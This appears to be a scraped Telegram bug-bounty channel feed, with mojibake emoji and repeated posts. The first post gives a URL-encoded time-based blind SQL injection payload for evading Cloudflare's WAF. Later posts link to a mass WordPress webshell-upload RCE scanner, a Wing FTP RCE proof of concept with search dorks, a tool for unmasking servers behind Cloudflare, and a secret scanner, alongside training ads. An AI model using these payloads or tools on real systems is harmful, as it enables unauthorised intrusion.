π‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
β Bypass Payload
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β Credit: @nav1n0x
β€35π5πΏ4π1
β‘SSTImap - Automatic SSTI detection tool with interactive interface
β https://github.com/vladko312/SSTImap
β https://github.com/vladko312/SSTImap
β€11π3
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
β IP & Domain Lookup
β Email & Phone OSINT
β Subdomain Enumeration
β Reverse Image Search
β URL & Virus Scanners
β Temp Email, QR Tools, and more
π You can create and play your own CTF in a minute , right inside Discord!
Try it out now β itβs fast, simple, and all in one chat.
π https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
1π«‘8β€4
π¨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β Download: https://github.com/alihussainzada/BugHunterMethodology/
β€11π4
β‘CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
β https://github.com/spyboy-productions/CloakQuest3r
β https://github.com/spyboy-productions/CloakQuest3r
β€22
This media is not supported in your browser
VIEW IN TELEGRAM
β‘Scanning github repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
β Check this out - https://github.com/trufflesecurity/trufflehog
β€24π₯7π2
π¨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
β https://github.com/ill-deed/CVE-2025-34085-Multi-target
π6β€4
π¨ CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: https://product.name="Wing FTP Server"
π₯PoC : https://github.com/4m3rr0r/CVE-2025-47812-poc
πDorks:
HUNTER: https://product.name="Wing FTP Server"
π₯11β€4π4
π¨ New Batch Starting β August 2025 π¨
Brut Practical Web Penetration Testing (bPWP)
Weβre back with a fresh batch of our most in-demand training β Brut Practical Web Penetration Testing β starting this August!
π Learn the art of Web Hacking with:
β 100% Practical Sessions
β Bug Bounty Approach
β Real-World Lab Scenarios
β Lifetime Community Access
β Beginner-Friendly with Advanced Techniques
π» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
π Limited Seats β Enroll Now
π https://brutsec.com/bPWP
π© For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity |
Email: [email protected]
Brut Practical Web Penetration Testing (bPWP)
Weβre back with a fresh batch of our most in-demand training β Brut Practical Web Penetration Testing β starting this August!
π Learn the art of Web Hacking with:
β 100% Practical Sessions
β Bug Bounty Approach
β Real-World Lab Scenarios
β Lifetime Community Access
β Beginner-Friendly with Advanced Techniques
π» Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
π Limited Seats β Enroll Now
π https://brutsec.com/bPWP
π© For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity |
+918945971332Email: [email protected]
β€9π’2π1
β‘AllForOne allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories.
π¨https://github.com/AggressiveUser/AllForOne
π¨https://github.com/AggressiveUser/AllForOne
π₯19β€4π3
π»SpoofProof helps security professionals detect email domain spoofing vulnerabilities and validate DMARC, SPF, and DKIM configurations, making email security assessments seamless and efficient.
βExtension Name: SpoofProof - Domain Spoofing Validation
π BApp Store: https://portswigger.net/bappstore/a321360c6e114b3dab6f2c67d68c241a
π» Source Code: https://github.com/portswigger/spoofproof
βExtension Name: SpoofProof - Domain Spoofing Validation
π BApp Store: https://portswigger.net/bappstore/a321360c6e114b3dab6f2c67d68c241a
π» Source Code: https://github.com/portswigger/spoofproof
β€13π₯5
β‘BrutDroid 2.0 is a powerful, Windows-optimized toolkit designed specifically for Android Studio, streamlining the setup of a mobile penetration testing lab. Built to make Android pentesting effortless, it automates emulator creation, rooting, Frida server setup, and Burp Suite certificate installation. With a vibrant new UI and support for custom Frida scripts, BrutDroid empowers security researchers to focus on testing, not setup. Linux support is coming soon!
β https://github.com/Brut-Security/BrutDroid
βDon't forget to leave a star :)
β https://github.com/Brut-Security/BrutDroid
βDon't forget to leave a star :)
β€31π₯2